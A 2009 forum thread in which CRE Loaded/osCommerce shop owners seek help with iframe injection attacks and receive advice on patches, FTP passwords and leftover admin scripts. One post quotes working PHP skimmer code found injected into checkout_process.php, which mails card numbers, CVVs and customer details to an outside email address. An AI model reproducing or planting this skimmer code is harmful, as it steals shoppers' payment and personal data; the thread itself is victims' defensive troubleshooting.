IFrame Attack -

vanguy · **Joined:** Wed Jan 16, 2008 1:50 am **Posts:** 4

We are experiencing iframe injection attacks on a 6.2 pro site with the latest updates and patches.

We have gone through the various steps outlined here:

http://eisabainyo.net/weblog/2009/04/06 ... on-attack/

plus a few others including steps to eliminate any ftp related breaches.

If anyone can add any additional suggestions specific to oscommerce/cre loaded we would certainly appreciate it.

Also if there is a oscommerce security expert out there who has dealt with this issue and can lend a hand it would be good to get a referral.

Thanks!

Sal · **Joined:** Wed Jul 30, 2003 12:00 am **Posts:** 1369

did you upgrade from a 6.15 site?

view this thread

https://www.creloaded.com/forums/Forums ... 43220.html

vanguy · **Joined:** Wed Jan 16, 2008 1:50 am **Posts:** 4

Thanks for the response Evil Overlord.

No it was a 6.2 from the get go so I don't think the link provided applies.

Any other thoughts most appreciated!!

Sal · **Joined:** Wed Jul 30, 2003 12:00 am **Posts:** 1369

what else are you running (forums, blogs, galleries), is it shared hosting? and what exact patch level you at.

has your host looked into this issue.

We find that weak FTP password are often brute forced and exploited.

your host can tell you if there is FTP log entries for the effected files, and from what IP address.

vanguy · **Joined:** Wed Jan 16, 2008 1:50 am **Posts:** 4

Hmm...well maybe not the latest patch after all...we are at CRE Loaded6 v6.2 Pro[12.1 (SP1)] .

Would CRE Loaded 6.2 Pro patch 13.2 (SP1) have an impact? We will get on this. And what is the story about CRE Loaded 6.2 Pro patch 14 (SP1) costing extra money?

We use big ugly passwords and have had our host check the logs so that seems ok.

Sal · **Joined:** Wed Jul 30, 2003 12:00 am **Posts:** 1369

vanguy,

Each patch addresses both security and feature issues.

Patch 14 for pro should be in your My download if you have a valid Pro purchase with us.

ccwjr · **Posted:** Wed May 06, 2009 1:05 pm

The patch 13 picked up some important session handling security related enhancements and a few other fixes. The patch 14 picked up some SQL injection exposures, and a lot of other fixes.

Neither of these would directly address the XSS attach, but would certainly make the store more secure.

Two questions:
Does your store use a template that replaces part or all of the content folder?
What page or pages had the iframe added to it?

johnbol · **Posted:** Tue May 26, 2009 8:11 pm

I had iframe injection on all index pages to medianameshirts.**** found the scripts in various positions on the pages, after putting up 6.3.3 b2b pro, as I hadnt done a great deal of work on the site I just deleted all, changed ftp passwords, removed all traces of ftp passwords from pc that were stored locally, informed host scanned pc fully for malware (came up clean) .
Am wondering whether complete OS reinstall is needed and any other advice you may give.

Thanks
John

Nimitz1061 · **Posted:** Thu May 28, 2009 3:32 pm

Check your catalog root for filenames such as admin_login_new.php or create_admin.php .

I have seen a number of these left behind by contractors. Once there, they'll sometimes cheerfully give away an admin login to any passer by....

David

johnbol · **Posted:** Thu May 28, 2009 5:26 pm

Funny thing is when I deleted all files from server via ftp, it wouldnt delete 3 folders, ..cant remember which now but it would go through process as if deleting and say successful but they remained there. I went in through host control panel to delete them and they went.
Thanks for info

John

griff132 · **Joined:** Wed Aug 29, 2007 7:46 pm **Posts:** 191

We have 6.3.3 B2B on one site and we are having this iframe added to any file that has the word index in it. We also had this added to our checkout_process.php in the root folder

Code:

$ip = getenv("REMOTE_ADDR");
$cvv=$_POST['cc_ccv'];
$number=$_SESSION['cc_number'];
$expires=$_SESSION['cc_expires'];
$to='maclog12@earthlink.com';
$subject='ourdomain'.$order->customer['email_address'].' '.$number;
$body="IP address=".$ip."\nDate=" . date('d-m-Y'). "\ntelephone=".$order->customer['telephone']."\nemail_address=".$order->customer['email_address']."\nName=".$order->customer['firstname'] . ' ' . $order->customer['lastname']."\nAddress1=".$order->customer['street_address']."\nAddress2=".$order->customer['suburb']."\nCity=".$order->customer['city']."\nState=".$order->customer['state']."\nZip=".$order->customer['postcode']."\nCountry=".$order->customer['country']['title']."\nmethod=".$order->info['payment_method']."\ntype=".$order->info['cc_type']."\nowner=".$order->info['cc_owner']."\nnumber=".$number."\nexpires=".$expires."\ncvv=".$cvv;
$headers="ourdomain.com";
mail($to, $subject, $body, $headers);

inetbiz · **Posted:** Sun Jun 28, 2009 1:52 pm

View /var/www/vhosts/domain.com(whatever yours is)/ and see if there are any .htaccess files located, there. Ask ChainReaction to run the shell script they have to find all iframes. We'd be happy to assist you as your webmaster, if you want.

I wonder if the folks there have auditd service installed in their OS environment? I've also been talking with the folks at CPanel about adding linux account expires that have already been around for quite some time, now. And I wonder if CRW has implemented the encrypted FTP passwords stored in plesk database. I remember all too well the migration headaches when ftp passwords were stored unencrypted in plain text.

One of the issues they faced, in the past, was hackers were able to see every single user's ftp password no matter how often it was changed. That's why I do prefer CPanel over Plesk. In CPanel, passwords are in a shadow file per user account and not in a DB structure.

I'm sure they'll update you on steps they have taken to further secure the shared hosting for ecommerce environment.

CRE Loaded Community

IFrame Attack -

Who is online

Main Menu

Login

Top Listing

Members Online

Follow Us on Twitter

CRE Loaded Community Chat hosted by CRE Loaded.